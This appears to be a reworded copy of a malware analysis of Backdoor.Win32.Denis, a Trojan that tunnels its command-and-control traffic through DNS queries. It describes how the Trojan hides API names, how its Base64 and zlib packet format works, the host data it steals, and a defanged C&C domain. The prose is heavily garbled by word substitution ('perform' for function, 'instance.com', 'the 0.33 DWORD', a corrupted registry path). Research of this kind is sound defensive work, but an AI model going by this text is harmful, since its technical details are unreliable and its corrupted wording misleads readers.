network communication is a key perform for any computer virus. sure, there are exceptions, comparable to cryptors and ransomware Trojans that can do their job just effective without the usage of the web. then again, in addition they require their victims to establish contact with the possibility actor so they can send the ransom and recuperate their encrypted information. If we pass over these two and take a look at the kinds of malware that don’t have any verbal exchange with a C&C and/or danger actor, all that remains are a few out of date or extinct families of malware (such as Trojan-ArcBomb), or irrelevant, crudely made prankware that frequently does nothing greater than scare the user with screamers or switches mouse buttons.
Malware has come a long way because the Morris worm, and the authors by no means cease looking for new ways to care for conversation with their creations. Some create complicated, multi-tier authentication and management protocols that may take weeks or even months for analysists to decipher. Others return to the fundamentals and use IRC servers as a administration host – as we noticed within the up to date case of Mirai and its a lot of clones.
ceaselessly, virus writers don’t even bother to run encryption or mask their communications: directions and related knowledge is sent in simple textual content, which comes in handy for a researcher examining the bot. This manner is typical of incompetent cybercriminals and even skilled programmers who don’t have so much expertise developing malware.
however, you do get the occasional off-the-wall procedures that don’t fall into both of the above classes. Take, as an example, the case of a Trojan that Kaspersky Lab researchers revealed in mid-March and which establishes a DNS tunnel for communication with the C&C server.
The bug in query is detected through Kaspersky Lab merchandise as Backdoor.Win32.Denis. This Trojan permits an outsider to control the file machine, run arbitrary commands and run loadable modules.
identical to lots of other Trojans prior to it, Backdoor.Win32.Denis extracts the addresses of the capabilities it must function from loaded DLLs. on the other hand, as a substitute of calculating the checksums of the names in the export table (which is what normally happens), this Trojan simply compares the names of the API calls in opposition to a listing. The checklist of API names is encrypted by means of subtracting 128 from each symbol of the function name.
It will have to be referred to that the bot uses two versions of encryption: for API name names and the strings required for it to function, it does the subtraction from each byte; for DLLs, it subtracts from each different byte. To load DLLs the usage of their names, LoadLibraryW is used, which means broad strings are required.
‘Decrypting’ strings within the Trojan
Names of API capabilities and libraries in encrypted layout
It should also be mentioned that handiest one of the most features are decrypted like this. within the body of the Trojan, references to extracted features alternate with references to features bought from the loader.
The theory at the back of a DNS tunnel’s operation can also be summed up as: “if you don’t recognize, ask somebody else”. When a DNS server receives a DNS request with an address to be resolved, the server starts searching for it in its database. If the record isn’t found, the server sends a request to the area mentioned within the database.
Let’s see how this works when a request arrives with the URL Y3VyaW9zaXR5.example.com to be resolved. The DNS server receives this request and first attempts to seek out the domain extension ‘.com’, then ‘example.com’, however then it fails to find ‘Y3VyaW9zaXR5.example.com’ in its database. It then forwards the request to example.com and asks it if this sort of title is legendary to it. In response, instance.com is predicted to come back the appropriate IP; however, it might probably return an arbitrary string, together with C&C directions.
Dump of Backdoor.Win32.Denis traffic
this is what Backdoor.Win32.Denis does. The DNS request is shipped first to 8.eight.8.8, then forwarded to z.teriava[.]com. everything that comes earlier than this address is the textual content of the request sent to the C&C.
here is the response:
DNS packet got in line with the primary request
obviously, the request despatched to the C&C is encrypted with Base64. the unique request is a sequence of zeros and the result of GetTickCount on the finish. The bot due to this fact receives its unique id and uses it for identification at first of the packet.
The instruction number is sent within the fifth DWORD, if we count from the beginning of the part highlighted inexperienced in the diagram above. next comes the dimensions of the info got from C&C. the information, packed using zlib, begins straight away after that.
The unpacked C&C response
the first 4 bytes are the information size. All that comes subsequent is the data, which may range depending on the type of guideline. on this case, it’s the distinctive id of the bot, as mentioned prior. We should level out that the info in the packet is in big-endian structure.
The bot identification (highlighted) is stated initially of every request despatched to the C&C
Altogether, there are sixteen instructions the Trojan can handle, even if the selection of the final guideline is 20. lots of the directions issue interplay with the file machine of the attacked computer. also, there are capabilities to realize data about open home windows, name an arbitrary API or receive temporary info in regards to the device. let us seem to be into the remaining of those in more element, as this instruction is accomplished first.
complete record of C&C instructions
details about the contaminated pc, despatched to the C&C
As will also be viewed within the screenshot above, the bot sends the computer title and the person title to the C&C, as well as the information saved in the registry department deviceinadequateinadequate.INI:
- Time when that specific guideline was once last finished. (If performed for the primary time, ‘GetSystemTimeAsFileTime’ is back, and the variable BounceTime is set, in which the end result is written);
- UsageCount from the identical registry department.
details about the running system and the setting can also be sent. This information is received with the lend a hand of NetWkstaGetInfo.
the information is packed the usage of zlib.
The DNS response previous to Base64 encryption
The fields within the response are as follows (simplest the part highlighted in red with information and measurement varies relying on the instruction):
- Bot identity;
- dimension of the previous C&C response;
- The 0.33 DWORD within the C&C response;
- all the time equals 1 for a response;
- measurement of information after the required box;
- dimension of response;
- actual response.
After the registration stage is complete, the Trojan starts to query the C&C in an unlimited loop. When no instructions are sent, the communication seems like a series of empty queries and responses.
Sequence of empty queries sent to the C&C
the use of a DNS tunneling for conversation, as used by Backdoor.Win32.Denis, is an extraordinarily rare incidence, albeit not distinctive. A similar methodology was once prior to now used in some POS Trojans and in some APTs (e.g. Backdoor.Win32.Gulpix within the PlugX household). then again, this use of the DNS protocol is new on PCs. We presume this method is prone to transform more and more well-liked by malware writers. We’ll keep an eye on how this way is implemented in malicious applications in future.